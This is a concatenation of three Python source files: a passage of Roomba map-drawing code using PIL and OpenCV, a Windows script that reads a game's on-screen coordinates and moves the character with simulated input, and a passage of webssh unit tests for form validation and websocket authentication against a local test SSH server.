roomba_sprite = Image.new('RGBA', self.base.size, self.transparent)
#draw roomba
self.log.info("MAP: drawing roomba: pos: %s, theta: %s"
% (roomba_pos, theta))
has_problems = False
if stuck:
self.log.info("MAP: Drawing stuck Roomba")
self.roomba_problem.paste(self.roomba_error_icon,roomba_pos)
has_problems = True
if cancelled:
self.log.info("MAP: Drawing cancelled Roomba")
self.roomba_problem.paste(self.roomba_cancelled_icon,roomba_pos)
has_problems = True
if bin_full:
self.log.info("MAP: Drawing full bin")
self.roomba_problem.paste(self.bin_full_icon,roomba_pos)
has_problems = True
if battery_low:
self.log.info("MAP: Drawing low battery Roomba")
self.roomba_problem.paste(self.roomba_battery_icon,roomba_pos)
has_problems = True
roomba_sprite = self.transparent_paste(
roomba_sprite,
self.roomba_icon.rotate(theta, expand=False), roomba_pos)
# paste dock over roomba_sprite
if self.dock_icon is not None:
roomba_sprite = self.transparent_paste(
roomba_sprite, self.dock_icon, self.dock_position)
'''# save base lines
self.base.save(self.mapPath + '/' + self.roombaName + 'lines.png',
"PNG")
# save problem overlay
self.roomba_problem.save(self.mapPath + '/' + self.roombaName + \
'problems.png', "PNG")'''
if self.roomOutline or self.auto_rotate:
# draw room outline (saving results if this is a final map) update
# x,y and angle if auto_rotate
self.draw_room_outline(draw_final)
# merge room outline into base
if self.roomOutline:
#if we want to draw the room outline
out = Image.alpha_composite(self.base, self.room_outline)
else:
out = self.base
#merge roomba lines (trail) with base
out = Image.alpha_composite(out, roomba_sprite)
if has_problems:
#merge problem location for roomba into out
out = Image.alpha_composite(out, self.roomba_problem)
if draw_final and self.auto_rotate:
#translate image to center it if auto_rotate is on
self.log.info("MAP: calculation of center: (%d,%d), "
"translating final map to center it, x:%d, y:%d "
"deg: %.2f" % (
self.cx, self.cy, self.cx - out.size[0] // 2,
self.cy - out.size[1] // 2,
self.angle))
out = out.transform(
out.size, Image.AFFINE,
(1, 0, self.cx-out.size[0] // 2,
0, 1, self.cy-out.size[1] // 2))
# map is upside down, so rotate 180 degrees, and size to fit (NW 12/4/2018 fixed bug causing distorted maps when rotation is not 0)
#out_rotated = out.rotate(180 + self.angle, expand=True).resize(self.base.size) #old version
out_rotated = out.rotate(180, expand=False)
# save composite image
self.save_text_and_map_on_whitebg(out_rotated)
if draw_final:
self.show_final_map = True # prevent re-drawing of map until reset
def save_text_and_map_on_whitebg(self, map):
# if no map or nothing changed
if map is None or (map == self.previous_map_no_text and
self.previous_display_text == self.display_text):
return
self.map_no_text = map
self.previous_map_no_text = self.map_no_text
self.previous_display_text = self.display_text
self.map_no_text.save(self.mapPath + '/' + self.roombaName +
'map_notext.png', "PNG")
if( self.enableMapWithText ):
final = Image.new('RGBA', self.base.size, (255,255,255,255)) # white
# paste onto a white background, so it's easy to see
final = Image.alpha_composite(final, map)
final = final.rotate(self.angle, expand=True) #(NW 12/4/2018 fixed bug causing distorted maps when rotation is not 0 - moved rotate to here)
# draw text
self.draw_text(final, self.display_text, self.fnt)
final.save(self.mapPath + '/'+self.roombaName + '_map.png', "PNG")
# try to avoid other programs reading file while writing it,
# rename should be atomic.
os.rename(self.mapPath + '/' + self.roombaName + '_map.png',
self.mapPath + '/' + self.roombaName + 'map.png')
def ScaleRotateTranslate(self, image, angle, center=None, new_center=None,
scale=None, expand=False):
'''
experimental - not used yet
'''
if center is None:
return image.rotate(angle, expand)
angle = -angle / 180.0 * math.pi
nx, ny = x, y = center
if new_center != center:
(nx, ny) = new_center
sx = sy = 1.0
if scale:
(sx, sy) = scale
cosine = math.cos(angle)
sine = math.sin(angle)
a = cosine / sx
b = sine / sx
c = x - nx * a - ny * b
d = -sine / sy
e = cosine / sy
f = y - nx * d - ny * e
return image.transform(image.size, Image.AFFINE,
(a,b,c,d,e,f), resample=Image.BICUBIC)
def match_outlines(self, orig_image, skewed_image):
orig_image = np.array(orig_image)
skewed_image = np.array(skewed_image)
try:
surf = cv2.xfeatures2d.SURF_create(400)
except Exception:
surf = cv2.SIFT(400)
kp1, des1 = surf.detectAndCompute(orig_image, None)
kp2, des2 = surf.detectAndCompute(skewed_image, None)
FLANN_INDEX_KDTREE = 0
index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=5)
search_params = dict(checks=50)
flann = cv2.FlannBasedMatcher(index_params, search_params)
matches = flann.knnMatch(des1, des2, k=2)
# store all the good matches as per Lowe's ratio test.
good = []
for m, n in matches:
if m.distance < 0.7 * n.distance:
good.append(m)
MIN_MATCH_COUNT = 10
if len(good) > MIN_MATCH_COUNT:
src_pts = np.float32([kp1[m.queryIdx].pt for m in good
]).reshape(-1, 1, 2)
dst_pts = np.float32([kp2[m.trainIdx].pt for m in good
]).reshape(-1, 1, 2)
M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)
# see https://ch.mathworks.com/help/images/examples/find-image-rotation-and-scale-using-automated-feature-matching.html for details
ss = M[0, 1]
sc = M[0, 0]
scaleRecovered = math.sqrt(ss * ss + sc * sc)
thetaRecovered = math.atan2(ss, sc) * 180 / math.pi
self.log.info("MAP: Calculated scale difference: %.2f, "
"Calculated rotation difference: %.2f" %
(scaleRecovered, thetaRecovered))
#deskew image
im_out = cv2.warpPerspective(skewed_image, np.linalg.inv(M),
(orig_image.shape[1], orig_image.shape[0]))
return im_out
else:
self.log.warn("MAP: Not enough matches are found - %d/%d"
% (len(good), MIN_MATCH_COUNT))
return skewed_image
def draw_room_outline(self, overwrite=False):
'''
draw room outline
'''
self.log.info("MAP: checking room outline")
if HAVE_CV2:
if self.room_outline_contour is None or overwrite:
try:
self.room_outline_contour = np.load(
self.mapPath + '/' + self.roombaName + 'room.npy')
except IOError as e:
self.log.warn("Unable to load room outline: %s, setting "
"to 0" % e)
self.room_outline_contour = np.array(
[(0,0),(0,0),(0,0),(0,0)], dtype=np.int)
try:
self.log.info("MAP: openening existing room outline image")
self.room_outline = Image.open(
self.mapPath + '/' + self.roombaName + 'room.png').\
convert('RGBA')
if self.room_outline.size != self.base.size:
raise IOError("Image is wrong size")
except IOError as e:
self.room_outline = Image.new(
'RGBA', self.base.size, self.transparent)
self.log.warn("MAP: room outline image problem: %s: "
"set to New" % e)
room_outline_area = cv2.contourArea(self.room_outline_contour)
# edgedata = cv2.add(
# np.array(self.base.convert('L'), dtype=np.uint8),
# np.array(self.room_outline.convert('L'), dtype=np.uint8))
edgedata = np.array(self.base.convert('L'))
# find external contour
_, contours, _ = self.findContours(
edgedata,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
if contours[0] is None: return
if len(contours[0]) < 5: return
max_area = cv2.contourArea(contours[0])
# experimental shape matching
# note cv2.cv.CV_CONTOURS_MATCH_I1 does not exist in CV 3.0,
# so just use 1
match = cv2.matchShapes(
self.room_outline_contour,contours[0],1,0.0)
self.log.info("MAP: perimeter/outline match is: %.4f" % match)
# if match is less than 0.35 - shapes are similar (but if it's 0 -
# then they are the same shape..) try auto rotating map to fit.
if match < 0.35 and match > 0:
#self.match_outlines(self.room_outline, self.base)
pass
if max_area > room_outline_area:
self.log.info("MAP: found new outline perimiter")
self.room_outline_contour = contours[0]
perimeter = cv2.arcLength(self.room_outline_contour,True)
outline = Image.new('RGBA',self.base.size,self.transparent)
edgeimage = np.array(outline) # make blank RGBA image array
# self.draw_edges is the max deviation from a line (set to 0.3%)
# you can fiddle with this
approx = cv2.approxPolyDP(
self.room_outline_contour,
self.draw_edges * perimeter,
True)
# outline with grey, width 1
cv2.drawContours(edgeimage,[approx] , -1, self.outlineColor, self.outlineWidth)
self.room_outline = Image.fromarray(edgeimage)
else:
if self.room_outline is None or overwrite:
try:
self.log.info("MAP: openening existing room outline image")
self.room_outline = Image.open(
self.mapPath + '/' + self.roombaName + 'room.png').\
convert('RGBA')
if self.room_outline.size != self.base.size:
raise IOError("Image is wrong size")
except IOError as e:
self.room_outline = Image.new(
'RGBA', self.base.size, self.transparent)
self.log.warn("MAP: room outline image problem: %s: "
"set to New" % e)
edges = ImageOps.invert(self.room_outline.convert('L'))
edges.paste(self.base)
edges = edges.convert('L').filter(ImageFilter.SMOOTH_MORE)
edges = ImageOps.invert(edges.filter(ImageFilter.FIND_EDGES))
self.room_outline = self.make_transparent(edges, (0, 0, 0, 255))
if overwrite or self.debug:
# save room outline
self.room_outline.save(
self.mapPath+'/'+self.roombaName+'room.png', "PNG")
if HAVE_CV2:
# save room outline contour as numpy array
np.save(self.mapPath + '/' + self.roombaName + 'room.npy',
self.room_outline_contour)
if self.auto_rotate:
# update outline centre
self.get_image_parameters(
image=self.room_outline, contour=self.room_outline_contour,
final=overwrite)
self.log.info("MAP: calculation of center: (%d,%d), "
"translating room outline to center it, "
"x:%d, y:%d deg: %.2f" % (
self.cx, self.cy,
self.cx - self.base.size[0] // 2,
self.cy - self.base.size[1] // 2,
self.angle))
# center room outline, same as map.
self.room_outline = self.room_outline.transform(
self.base.size, Image.AFFINE,
(1, 0, self.cx - self.base.size[0] // 2,
0, 1, self.cy-self.base.size[1]//2))
self.log.info("MAP: Wrote new room outline files")
def PIL_get_image_parameters(self, image=None, start=90, end = 0, step=-1,
recursion=0):
'''
updates angle of image, and centre using PIL.
NOTE: this assumes the floorplan is rectangular! if you live in a
lighthouse, the angle will not be valid!
input is PIL image
'''
if image is not None and HAVE_PIL:
imbw = image.convert('L')
max_area = self.base.size[0] * self.base.size[1]
x_y = (self.base.size[0] // 2, self.base.size[1] // 2)
angle = self.angle
div_by_10 = False
if step >=10 or step <=-10:
step /= 10
div_by_10 = True
for try_angle in range(start, end, step):
if div_by_10:
try_angle /= 10.0
#rotate image and resize to fit
im = imbw.rotate(try_angle, expand=True)
box = im.getbbox()
if box is not None:
area = (box[2]-box[0]) * (box[3]-box[1])
if area < max_area:
angle = try_angle
x_y = ((box[2] - box[0]) // 2 + box[0],
(box[3] - box[1]) // 2 + box[1])
max_area = area
if recursion >= 1:
return x_y, angle
x_y, angle = self.PIL_get_image_parameters(
image,
(angle + 1) * 10,
(angle - 1) * 10, -10,
recursion + 1)
# self.log.info("MAP: PIL: image center: "
# "x:%d, y:%d, angle %.2f" % (x_y[0], x_y[1], angle))
return x_y, angle
def get_image_parameters(self, image=None, contour=None, final=False):
'''
updates angle of image, and centre using cv2 or PIL.
NOTE: this assumes the floorplan is rectangular! if you live in a
lighthouse, the angle will not be valid!
input is cv2 contour or PIL image
routines find the minnimum area rectangle that fits the image outline
'''
if contour is not None and HAVE_CV2:
# find minnimum area rectangle that fits
# returns (x,y), (width, height), theta - where (x,y) is the center
x_y,l_w,angle = cv2.minAreaRect(contour)
elif image is not None and HAVE_PIL:
x_y, angle = self.PIL_get_image_parameters(image)
else:
return
if angle < self.angle - 45:
angle += 90
if angle > 45-self.angle:
angle -= 90
if final:
self.cx = x_y[0]
self.cy = x_y[1]
self.angle = angle
self.log.info("MAP: image center: x:%d, y:%d, angle %.2f" %
(x_y[0], x_y[1], angle))
def angle_between(self, p1, p2):
'''
clockwise angle between two points in degrees
'''
if HAVE_CV2:
ang1 = np.arctan2(*p1[::-1])
ang2 = np.arctan2(*p2[::-1])
return np.rad2deg((ang1 - ang2) % (2 * np.pi))
else:
side1=math.sqrt(((p1[0] - p2[0]) ** 2))
side2=math.sqrt(((p1[1] - p2[1]) ** 2))
return math.degrees(math.atan(side2/side1))
def findContours(self,image,mode,method):
'''
Version independent find contours routine. Works with OpenCV 2 or 3 or 4.
Returns modified image (with contours applied), contours list, hierarchy
'''
ver = int(cv2.__version__.split(".")[0])
im = image.copy()
if ver == 2 or ver == 4: #NW fix for OpenCV V4 21st Dec 2018
contours, hierarchy = cv2.findContours(im,mode,method)
return im, contours, hierarchy
else:
im_cont, contours, hierarchy = cv2.findContours(im,mode,method)
return im_cont, contours, hierarchy
def draw_final_map(self, overwrite=False):
'''
draw map with outlines at end of mission. Called when mission has
finished and Roomba has docked
'''
merge = Image.new('RGBA',self.base.size,self.transparent)
if HAVE_CV2:
# NOTE: this is CPU intensive!
edgedata = np.array(self.base.convert('L'), dtype=np.uint8)
# find all contours
_, contours, _ = self.findContours(
edgedata,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
# zero edge data for later use
edgedata.fill(0)
max_perimeter = 0
max_contour = None
for cnt in contours:
perimeter = cv2.arcLength(cnt,True)
if perimeter >= max_perimeter:
max_contour = cnt # get the contour with maximum length
max_perimeter = perimeter
if max_contour is None: return
if len(max_contour) < 5: return
try:
contours.remove(max_contour) # remove max contour from list
except ValueError:
self.log.warn("MAP: unable to remove contour")
pass
mask = np.full(edgedata.shape, 255, dtype=np.uint8) # white
# create mask (of other contours) in black
cv2.drawContours(mask,contours, -1, 0, -1)
# self.draw_edges is the max deviation from a line
# you can fiddle with this in enable_map
approx = cv2.approxPolyDP(max_contour,
self.draw_edges * max_perimeter,True)
bgimage = np.array(merge) # make blank RGBA image array
# draw contour and fill with "lawngreen"
cv2.drawContours(bgimage,[approx] , -1, (124, 252, 0, 255), -1)
# mask image with internal contours
bgimage = cv2.bitwise_and(bgimage,bgimage,mask = mask)
# not dure if you really need this - uncomment if you want the
# area outlined.
# draw longest contour aproximated to lines (in black), width 1
cv2.drawContours(edgedata,[approx] , -1, (255), 1)
outline = Image.fromarray(edgedata) # outline
base = Image.fromarray(bgimage) # filled background image
else:
base = self.base.filter(ImageFilter.SMOOTH_MORE)
# draw edges at end of mission
outline = base.convert('L').filter(ImageFilter.FIND_EDGES)
# outline = ImageChops.subtract(
# base.convert('L').filter(ImageFilter.EDGE_ENHANCE),
# base.convert('L'))
edges = ImageOps.invert(outline)
edges = self.make_transparent(edges, (0, 0, 0, 255))
if self.debug:
edges.save(self.mapPath+'/'+self.roombaName+'edges.png', "PNG")
merge = Image.alpha_composite(merge,base)
merge = Image.alpha_composite(merge,edges)
if overwrite:
self.log.info("MAP: Drawing final map")
self.last_completed_time = time.time()
self.base=merge
if self.debug:
merge_rotated = merge.rotate(180+self.angle, expand=True)
merge_rotated.save(
self.mapPath+'/'+self.roombaName+'final_map.png', "PNG")
|
FindGameBasicInfo.py
|
# -*- coding: utf-8 -*-
import cv2
from cv2 import cv
import numpy as np
from matplotlib import pyplot as plt
from Tools import *
import win32gui
from PIL import ImageGrab
from PIL import Image
import win32con,win32api
import pythoncom, pyHook
import time
from DD import DD
import threading
import multiprocessing
from time import ctime,sleep
class GameBasicInfo(object):
def __init__(self):
self.map_name = ""
self.hero_location_info = [-1,-1]
self.minimap_location = [-1,-1]
self.isrun = True
self.game_hwnd = None
self.game_rect = []
self.client_rect = []
self.mapsizeinfo = read_mapsizeinfo("feature/map/mapsizeinfo.txt")
def start(self):
t = threading.Thread(target=self.do_update, args=())
t.start()
def stop(self):
self.isrun = False
def do_update(self):
self.isrun = True
self.game_hwnd = get_window_hwnd("WSGAME")
while self.isrun:
self.update()
pythoncom.PumpWaitingMessages()
time.sleep(0.01)
def update(self):
self.game_rect = win32gui.GetWindowRect(self.game_hwnd)
self.client_rect = win32gui.GetClientRect(self.game_hwnd)
image = get_window_rect_image(self.game_hwnd)
self.map_name, self.hero_location_info = get_coordinates(image)
# print mapname
# print "hero_location_info:",hero_location_info
################### 查找光标位置
image_mouse = cv2.imread("feature/other/mouse.png")
image_mouse_mask = cv2.imread("feature/other/mouse_mask.png",0)
find_list = find_obj_hist_mask(image,image_mouse,mask=image_mouse_mask,max_sum=2.5,move_px = 5,move_py = 5)
if len(find_list) > 0:
#print find_list[0]
start_point = find_list[0][0]
#cv2.rectangle(image, (start_point[0], start_point[1]), (start_point[0]+10, start_point[1]+10), (0, 0, 255), 4)
##查找小地图区域范围
rect_location = [ find_list[0][0][0] - 34 , find_list[0][0][1] - 26-5 ,68,26]
#cv2.rectangle(image, (rect_location[0], rect_location[1]), (rect_location[0]+rect_location[2], rect_location[1]+rect_location[3]), (0, 255, 0), 2)
image_sub = get_image_sub(image,rect_location)
self.minimap_location = get_minimap_location(image_sub)
#print "minimap_location:",minimap_location
def task_go_point(self,x,y):
t = threading.Thread(target=self.go_point, args=(x,y))
t.start()
def go_point(self,x,y):
win32gui.SetForegroundWindow(self.game_hwnd)
cent_x = self.game_rect[0]+self.client_rect[2]/2
cent_y = self.game_rect[1]+self.client_rect[3]/2
DD.DD_mov(cent_x,cent_y)
map_size_info = self.mapsizeinfo[self.map_name]
time.sleep(1)
DD.DD_key_click(300)
time.sleep(0.1)
while self.minimap_location[0] ==-1:
print self.minimap_location
time.sleep(0.2)
x_diff = x-self.minimap_location[0]
y_diff = self.minimap_location[1]-y
map_size = (float(map_size_info[0]),float(map_size_info[1]))
min_map_size = (float(map_size_info[2]),float(map_size_info[3]))
mov_x = int(x_diff*(min_map_size[0]/map_size[0]))
mov_y = int(y_diff*(min_map_size[1]/map_size[1]))
move_to_x = cent_x+mov_x
move_to_y = cent_y+mov_y
DD.DD_mov(move_to_x,move_to_y)
DD.DD_btn_click(1)
time.sleep(0.5)
mouse_offset = 1
max_count = 100
while (abs(x-self.minimap_location[0])>1 or abs(y-self.minimap_location[1])>0) and max_count>1:
max_count = max_count-1
print self.minimap_location
x_diff = x-self.minimap_location[0]
y_diff = self.minimap_location[1]-y
if(x_diff>0): move_to_x=move_to_x+mouse_offset
elif(x_diff<0): move_to_x=move_to_x-mouse_offset
if(y_diff>0): move_to_y=move_to_y+mouse_offset
elif(y_diff<0): move_to_y=move_to_y-mouse_offset
DD.DD_mov(move_to_x,move_to_y)
time.sleep(0.5)
DD.DD_btn_click(1)
DD.DD_btn_click(1)
DD.DD_key_click(300)
def go_point_mini(self,x,y):
win32gui.SetForegroundWindow(self.game_hwnd)
cent_x = self.game_rect[0]+self.client_rect[2]/2
cent_y = self.game_rect[1]+self.client_rect[3]/2+8
DD.DD_mov(cent_x,cent_y)
return
map_size_info = self.mapsizeinfo[self.map_name]
time.sleep(1)
mouse_offset = 50
max_count = 50
while (abs(x-self.hero_location_info[0])>2 or abs(y-self.hero_location_info[1])>2) and max_count>0:
max_count = max_count-1
#判断角色出现在屏幕的那个位置
offset_x,offset_y = self.hero_offset(map_size_info)
x_diff = x-self.hero_location_info[0]
y_diff = self.hero_location_info[1]-y
if(x_diff>0): offset_x=offset_x+mouse_offset
elif(x_diff<0): offset_x=offset_x-mouse_offset
if(y_diff>0): offset_y=offset_y+mouse_offset
elif(y_diff<0): offset_y=offset_y-mouse_offset
DD.DD_mov(cent_x+offset_x,cent_y+offset_y)
DD.DD_btn_click(1)
DD.DD_btn_click(1)
time.sleep(0.3)
def hero_offset(self,map_size_info):
"""
获取角色相对画面中心的偏移
"""
offset_x = 0
offset_y = 0
if self.hero_location_info[0] >= self.client_rect[0]/2 and self.hero_location_info[0] <= (map_size_info[0]- self.client_rect[0]/2):
offset_x = 0
elif self.hero_location_info[0] < self.client_rect[0]/2:
offset_x = self.hero_location_info[0] - self.client_rect[0]/2
elif self.hero_location_info[0] > (map_size_info[0]- self.client_rect[0]/2):
offset_x = self.hero_location_info[0] - (map_size_info[0]- self.client_rect[0]/2)
if self.hero_location_info[1] >= self.client_rect[1]/2 and self.hero_location_info[1] <= (map_size_info[1]- self.client_rect[1]/2):
offset_y = 0
elif self.hero_location_info[1] < self.client_rect[1]/2:
offset_y = self.client_rect[1]/2 - self.hero_location_info[1]
elif self.hero_location_info[1] > (map_size_info[1]- self.client_rect[1]/2):
offset_y = (map_size_info[1]- self.client_rect[1]/2) - self.hero_location_info[1]
return (offset_x,offset_y)
def find_point(image):
mach_list = []
match_info = []
feature_names = read_feature_file("feature/coordinates/names.txt")
feature_numbers = read_feature_file("feature/coordinates/numbers.txt")
image_bin = img_gray_and_bin(image,200,255)
#cv2.imwrite("image_bin.png",image_bin)
#先查找数字和汉字的分隔符
img_left = cv2.imread("feature/coordinates/left.png")
img_left_bin = img_gray_and_bin(img_left,200,255)
find_list = comparehits_bin_min(image_bin,img_left_bin,255)
if len(find_list) < 1 : return match_info
left_x = find_list[0][0]
img_right = cv2.imread("feature/coordinates/right.png")
img_right_bin = img_gray_and_bin(img_right,200,255)
find_list = comparehits_bin_min(image_bin,img_right_bin,255)
right_x = find_list[0][0]
if len(find_list) < 1 : return match_info
#print "left:",left_x," right:",right_x
#匹配地图名字
for i in xrange(len(feature_names)):
feature_img = cv2.imread("feature/coordinates/"+feature_names[i][0])
feature_img_bin = img_gray_and_bin(feature_img,200,255)
find_list = comparehits_bin_min(image_bin,feature_img_bin,2,0,left_x)
for m in find_list:
mach_list.append((m[0],feature_names[i][1]))
#print m[0],":",feature_names[i][1].decode('utf-8')," bc_min:",m[1]
mach_list.sort(cmp = lambda x ,y : cmp(x[0],y[0]))
for m in mach_list:
match_info.append(m[1])
#匹配坐标
mach_list =[]
for i in xrange(len(feature_numbers)):
feature_img = cv2.imread("feature/coordinates/"+feature_numbers[i][0])
feature_img_bin = img_gray_and_bin(feature_img,200,255)
find_list = comparehits_bin_min(image_bin,feature_img_bin,1,left_x,0)
for m in find_list:
mach_list.append((m[0],feature_numbers[i][1]))
#print m[0],":",feature_numbers[i][1].decode('utf-8')," bc_min:",m[1]
mach_list.sort(cmp = lambda x ,y : cmp(x[0],y[0]))
for m in mach_list:
match_info.append(m[1])
return match_info
def split_point(title_image):
#get_screen_sub_pilimage()
#pil_to_cv2
#title_image = get_screen_sub_pilimage(20, 20,110,18)
#title_image = Image.open('point.jpg')
cv_title_image = pil_to_cv2(title_image)
cv_title_image_bin = img_gray_and_bin(cv_title_image,200,255)
h, w = cv_title_image.shape[:2]
img_left = cv2.imread("feature/coordinates/left.png")
img_left_bin = img_gray_and_bin(img_left,200,255)
find_list = comparehits_bin_min(cv_title_image_bin,img_left_bin)
left_x = find_list[0][0]
img_right = cv2.imread("feature/coordinates/right.png")
img_right_bin = img_gray_and_bin(img_right,200,255)
find_list = comparehits_bin_min(cv_title_image_bin,img_right_bin)
right_x = find_list[0][0]
print "left:",left_x," right:",right_x
#切割汉字11个像素 H=12
endx = left_x - 1
while endx > 12:
bounds = (endx-11,0,endx,h)
sub_img = title_image.crop(bounds)
sub_img.save("point/"+str(endx)+".png")
print endx
endx = endx -11 -1
#切割数字5个像素
endx = right_x - 1
while endx-left_x > 6:
bounds = (endx-5,0,endx,h)
sub_img = title_image.crop(bounds)
sub_img.save("point/s_"+str(endx)+".png")
print endx
endx = endx -5 -1
def get_coordinates(image):
mapname = u""
hero_location = [-1,-1]
img = get_image_sub(image,(20, 24,110,12))
#cv2.imwrite("img.png",img)
mach_list = find_point(img)
info = ""
for m in mach_list:
info+=m
hero_location_info = info.decode('utf-8')
try:
h = hero_location_info.split('[')
mapname = h[0]
h = h[1].split(']')
h = h[0].split(',')
hero_location[0] = int(h[0])
hero_location[1] = int(h[1])
except Exception,e:
pass
return (mapname,hero_location)
def get_minimap_location(image):
minimap_location = [-1,-1]
mach_list = []
match_info = []
feature_numbers = read_feature_file("feature/minimaplocation/numbers.txt")
image_bin = img_gray_and_bin(image,200,255)
#cv2.imwrite("image_bin.png",image_bin)
#匹配坐标
for i in xrange(len(feature_numbers)):
feature_img = cv2.imread("feature/minimaplocation/"+feature_numbers[i][0])
feature_img_bin = img_gray_and_bin(feature_img,200,255)
find_list = comparehits_bin_min_x(image_bin,feature_img_bin,0.1,move_px=1)
for m in find_list:
mach_list.append((m[0],feature_numbers[i][1]))
mach_list.sort(cmp = lambda x ,y : cmp(x[0],y[0]))
for m in mach_list:
match_info.append(m[1])
info = ""
for m in match_info:
info+=m
if len(info)>0:
try:
x = info.split(",")
minimap_location = [int(x[0]),int(x[-1])]
except Exception,e:
pass
return minimap_location
|
test_app.py
|
import json
import random
import threading
import tornado.websocket
import tornado.gen
from tornado.testing import AsyncHTTPTestCase
from tornado.httpclient import HTTPError
from tornado.options import options
from tests.sshserver import run_ssh_server, banner
from tests.utils import encode_multipart_formdata, read_file, make_tests_data_path # noqa
from webssh import handler
from webssh.main import make_app, make_handlers
from webssh.settings import (
get_app_settings, get_server_settings, max_body_size
)
from webssh.utils import to_str
from webssh.worker import clients
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
handler.DELAY = 0.1
swallow_http_errors = handler.swallow_http_errors
class TestAppBase(AsyncHTTPTestCase):
def get_httpserver_options(self):
return get_server_settings(options)
def assert_response(self, bstr, response):
if swallow_http_errors:
self.assertEqual(response.code, 200)
self.assertIn(bstr, response.body)
else:
self.assertEqual(response.code, 400)
self.assertIn(b'Bad Request', response.body)
def assert_status_in(self, data, status):
self.assertIsNone(data['encoding'])
self.assertIsNone(data['id'])
self.assertIn(status, data['status'])
def assert_status_equal(self, data, status):
self.assertIsNone(data['encoding'])
self.assertIsNone(data['id'])
self.assertEqual(status, data['status'])
def assert_status_none(self, data):
self.assertIsNotNone(data['encoding'])
self.assertIsNotNone(data['id'])
self.assertIsNone(data['status'])
def fetch_request(self, url, method='GET', body='', headers={}, sync=True):
if not sync and url.startswith('/'):
url = self.get_url(url)
if isinstance(body, dict):
body = urlencode(body)
if not headers:
headers = self.headers
else:
headers.update(self.headers)
client = self if sync else self.get_http_client()
return client.fetch(url, method=method, body=body, headers=headers)
def sync_post(self, url, body, headers={}):
return self.fetch_request(url, 'POST', body, headers)
def async_post(self, url, body, headers={}):
return self.fetch_request(url, 'POST', body, headers, sync=False)
class TestAppBasic(TestAppBase):
running = [True]
sshserver_port = 2200
body = 'hostname=127.0.0.1&port={}&_xsrf=yummy&username=robey&password=foo'.format(sshserver_port) # noqa
headers = {'Cookie': '_xsrf=yummy'}
def get_app(self):
self.body_dict = {
'hostname': '127.0.0.1',
'port': str(self.sshserver_port),
'username': 'robey',
'password': '',
'_xsrf': 'yummy'
}
loop = self.io_loop
options.debug = False
options.policy = random.choice(['warning', 'autoadd'])
options.hostfile = ''
options.syshostfile = ''
options.tdstream = ''
app = make_app(make_handlers(loop, options), get_app_settings(options))
return app
@classmethod
def setUpClass(cls):
print('='*20)
t = threading.Thread(
target=run_ssh_server, args=(cls.sshserver_port, cls.running)
)
t.setDaemon(True)
t.start()
@classmethod
def tearDownClass(cls):
cls.running.pop()
print('='*20)
def test_app_with_invalid_form_for_missing_argument(self):
response = self.fetch('/')
self.assertEqual(response.code, 200)
body = 'port=7000&username=admin&password&_xsrf=yummy'
response = self.sync_post('/', body)
self.assert_response(b'Missing argument hostname', response)
body = 'hostname=127.0.0.1&port=7000&password&_xsrf=yummy'
response = self.sync_post('/', body)
self.assert_response(b'Missing argument username', response)
body = 'hostname=&port=&username=&password&_xsrf=yummy'
response = self.sync_post('/', body)
self.assert_response(b'Missing value hostname', response)
body = 'hostname=127.0.0.1&port=7000&username=&password&_xsrf=yummy'
response = self.sync_post('/', body)
self.assert_response(b'Missing value username', response)
def test_app_with_invalid_form_for_invalid_value(self):
body = 'hostname=127.0.0&port=22&username=&password&_xsrf=yummy'
response = self.sync_post('/', body)
self.assert_response(b'Invalid hostname', response)
body = 'hostname=http://www.googe.com&port=22&username=&password&_xsrf=yummy' # noqa
response = self.sync_post('/', body)
self.assert_response(b'Invalid hostname', response)
body = 'hostname=127.0.0.1&port=port&username=&password&_xsrf=yummy'
response = self.sync_post('/', body)
self.assert_response(b'Invalid port', response)
body = 'hostname=127.0.0.1&port=70000&username=&password&_xsrf=yummy'
response = self.sync_post('/', body)
self.assert_response(b'Invalid port', response)
def test_app_with_wrong_hostname_ip(self):
body = 'hostname=127.0.0.2&port=2200&username=admin&_xsrf=yummy'
response = self.sync_post('/', body)
self.assertEqual(response.code, 200)
self.assertIn(b'Unable to connect to', response.body)
def test_app_with_wrong_hostname_domain(self):
body = 'hostname=xxxxxxxxxxxx&port=2200&username=admin&_xsrf=yummy'
response = self.sync_post('/', body)
self.assertEqual(response.code, 200)
self.assertIn(b'Unable to connect to', response.body)
def test_app_with_wrong_port(self):
body = 'hostname=127.0.0.1&port=7000&username=admin&_xsrf=yummy'
response = self.sync_post('/', body)
self.assertEqual(response.code, 200)
self.assertIn(b'Unable to connect to', response.body)
def test_app_with_wrong_credentials(self):
response = self.sync_post('/', self.body + 's')
self.assert_status_in(json.loads(to_str(response.body)), 'Authentication failed.') # noqa
def test_app_with_correct_credentials(self):
response = self.sync_post('/', self.body)
self.assert_status_none(json.loads(to_str(response.body)))
def test_app_with_correct_credentials_but_with_no_port(self):
default_port = handler.DEFAULT_PORT
handler.DEFAULT_PORT = self.sshserver_port
# with no port value
body = self.body.replace(str(self.sshserver_port), '')
response = self.sync_post('/', body)
self.assert_status_none(json.loads(to_str(response.body)))
# with no port argument
body = body.replace('port=&', '')
response = self.sync_post('/', body)
self.assert_status_none(json.loads(to_str(response.body)))
handler.DEFAULT_PORT = default_port
@tornado.testing.gen_test
def test_app_with_correct_credentials_timeout(self):
url = self.get_url('/')
response = yield self.async_post(url, self.body)
data = json.loads(to_str(response.body))
self.assert_status_none(data)
url = url.replace('http', 'ws')
ws_url = url + 'ws?id=' + data['id']
yield tornado.gen.sleep(handler.DELAY + 0.1)
ws = yield tornado.websocket.websocket_connect(ws_url)
msg = yield ws.read_message()
self.assertIsNone(msg)
self.assertEqual(ws.close_reason, 'Websocket authentication failed.')
@tornado.testing.gen_test
def test_app_with_correct_credentials_user_robey(self):
url = self.get_url('/')
response = yield self.async_post(url, self.body)
data = json.loads(to_str(response.body))
self.assert_status_none(data)
url = url.replace('http', 'ws')
ws_url = url + 'ws?id=' + data['id']
ws = yield tornado.websocket.websocket_connect(ws_url)
msg = yield ws.read_message()
self.assertEqual(to_str(msg, data['encoding']), banner)
ws.close()
@tornado.testing.gen_test
def test_app_with_correct_credentials_but_without_id_argument(self):
url = self.get_url('/')
response = yield self.async_post(url, self.body)
data = json.loads(to_str(response.body))
self.assert_status_none(data)
url = url.replace('http', 'ws')
ws_url = url + 'ws'
ws = yield tornado.websocket.websocket_connect(ws_url)
msg = yield ws.read_message()
